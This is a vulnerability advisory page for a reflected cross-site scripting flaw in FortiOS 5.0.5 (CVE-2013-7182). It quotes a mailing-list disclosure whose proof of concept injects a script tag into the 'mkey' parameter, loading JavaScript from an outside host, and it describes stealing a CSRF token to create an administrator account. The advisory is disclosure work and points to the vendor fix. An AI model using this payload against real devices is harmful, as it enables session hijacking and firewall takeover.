Fortinet FortiGate/FortiOS Input Validation Flaw Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1029730 |
|
SecurityTracker URL: http://securitytracker.com/id/1029730
|
|
CVE Reference:
CVE-2013-7182
(Links to External Site)
|
Updated: Feb 12 2014
|
Original Entry Date: Feb 6 2014
|
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 5.0.5 and prior
|
Description:
A vulnerability was reported in Fortinet FortiGate/FortiOS. A remote user can conduct cross-site scripting attacks.
The '/firewall/schedule/recurrdlg' script does not properly filter HTML code from user-supplied input in the 'mkey' parameter before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the FortiGate interface and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
William Costa reported this vulnerability.
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the FortiGate interface, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Solution:
The vendor has issued a fix (5.0.6).
The vendor's advisory is available at:
http://www.fortiguard.com/advisory/FG-IR-14-003/
|
Vendor URL: www.fortiguard.com/advisory/FG-IR-14-003/ (Links to External Site)
|
Cause:
Input validation error
|
|
Message History:
None.
|
Source Message Contents
|
Subject: [Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ( CVE-2013-7182)
|
--===============0107256548==
Content-Type: multipart/alternative; boundary=047d7b86d55cf812f004f188a5da
--047d7b86d55cf812f004f188a5da
Content-Type: text/plain; charset=ISO-8859-1
I. VULNERABILITY
-------------------------
Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5
II. BACKGROUND
-------------------------
Fortinet's industry-leading, Network Security Platforms deliver Next
Generation Firewall (NGFW) security with exceptional throughput, ultra
low latency, and multi-vector threat protection.
III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in FortiOS in 5.0.5.
The code injection is done through the parameter "mkey" in the page
/firewall/schedule/recurrdlg"
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter "mkey" correctly.
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a"><SCRIPT
SRC="http://10.0.1.120/xss/good.js"></SCRIPT>
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a
targeteduser's browser, , that allows the execution of arbitrary
HTML/script code to be executed in the context of the victim user's
browser allowing theft CSRF token, thus enabling the creation of a
Administrator User in box for full access
VI. SYSTEMS AFFECTED
-------------------------
Try FortiOS v5.0.5 VM and Applaince
VII. SOLUTION
------------------------
Upgrade to FortiOS 5.0.6 or higher.
References
http://www.fortiguard.com/advisory/FG-IR-14-003/http://www.kb.cert.org/vuls/id/728638
By William Costa
--047d7b86d55cf812f004f188a5da
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
pre
{mso-style-priority:99;
mso-style-link:"HTML Preformatted Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
span.hps
{mso-style-name:hps;
mso-style-unhide:no;}
span.HTMLPreformattedChar
{mso-style-name:"HTML Preformatted Char";
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"HTML Preformatted";
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Courier New";
mso-ascii-font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Courier New";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:11.0pt;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
-->
</style>
<pre> </pre><pre>I. VULNERABILITY</pre><pre>-------------------------<=
/pre>
<p class=3D"MsoNormal" style=3D"line-height:normal">Reflected XSS Attacks v=
ulnerabilities
in FortiOS 5.0.5<b><span style=3D"font-size:12pt;font-family:"Times Ne=
w Roman""></span></b></p>
<pre> </pre><pre>II. BACKGROUND</pre><pre>-------------------------</p=
re><pre>Fortinet’s industry-leading, Network Security Platforms deliv=
er Next Generation Firewall (NGFW) security with exceptional throughput, ul=
tra low latency, and multi-vector threat protection.</pre>
<pre> </pre><pre>III. DESCRIPTION</pre><pre>-------------------------<=
/pre><pre>Has been detected a Reflected XSS vulnerability in <span class=3D=
""><span style lang=3D"EN">FortiOS in </span></span>5.0.5.</pre><pre>The co=
de injection is done through the parameter "mkey" in the page /fi=
rewall/schedule/recurrdlg”</pre>
<pre> </pre><pre>IV. PROOF OF CONCEPT</pre><pre>----------------------=
---</pre><pre>The application does not validate the parameter “mkey&r=
dquo; <span class=3D""><span style lang=3D"EN">correctly</span></span>.</pr=
e><pre> </pre><pre>
<a href=3D"http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=3Da">http:/=
/IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=3Da</a>"><SCRIPT =
SRC=3D"<a href=3D"http://10.0.1.120/xss/good.js">http://10.0.1.120/xss=
/good.js</a>"></SCRIPT>
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
pre
{mso-style-priority:99;
mso-style-link:"HTML Preformatted Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
span.hps
{mso-style-name:hps;
mso-style-unhide:no;}
span.HTMLPreformattedChar
{mso-style-name:"HTML Preformatted Char";
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"HTML Preformatted";
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Courier New";
mso-ascii-font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Courier New";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:11.0pt;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSec</style>
V. BUSINESS IMPACT<br>-------------------------<br>An attacker can ex=
ecute arbitrary HTML or script code in a targeteduser's browser, , that=
allows the execution of arbitrary HTML/script code to be executed in the c=
ontext of the victim user's browser allowing <span class=3D""><span sty=
le lang=3D"EN">theft</span></span><span style lang=3D"EN"> <span class=3D""=
>CSRF</span> <span class=3D"">token</span>, <span class=3D"">thus</span> <s=
pan class=3D"">enabling the creation</span> <span class=3D"">of a</span> Ad=
ministrator <span class=3D"">User in</span> <span class=3D"">box</span> <sp=
an class=3D"">for full access</span></span>
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:8.0pt;
margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
pre
{mso-style-priority:99;
mso-style-link:"HTML Preformatted Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
span.hps
{mso-style-name:hps;
mso-style-unhide:no;}
span.HTMLPreformattedChar
{mso-style-name:"HTML Preformatted Char";
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"HTML Preformatted";
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Courier New";
mso-ascii-font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Courier New";
mso-bidi-font-family:"Courier New";
mso-fareast-language:PT-BR;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:11.0pt;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Calibri;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSectio</style>
VI. SYSTEMS AFFECTED<br>-------------------------<span class=3D""><span sty=
le lang=3D"EN"><br>Try FortiOS v5.0.5 VM</span></span> and Applaince <br><b=
r><br><br>VII. SOLUTION<br>------------------------<br></pre><pre>Upgrade t=
o FortiOS 5.0.6 or higher.
<br></pre><h3>References<br></h3><pre><a href=3D"http://www.fortiguard.com/=
advisory/FG-IR-14-003/">http://www.fortiguard.com/advisory/FG-IR-14-003/</a=
>
<a href=3D"http://www.kb.cert.org/vuls/id/728638">http://www.kb.cert.org/vu=
ls/id/728638</a>
=20
By William Costa
<pre></pre><pre></pre><pre></pre><pre></pre><pre></pre><br></pre>
</div>
--047d7b86d55cf812f004f188a5da--
--===============0107256548==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0107256548==--
|
|
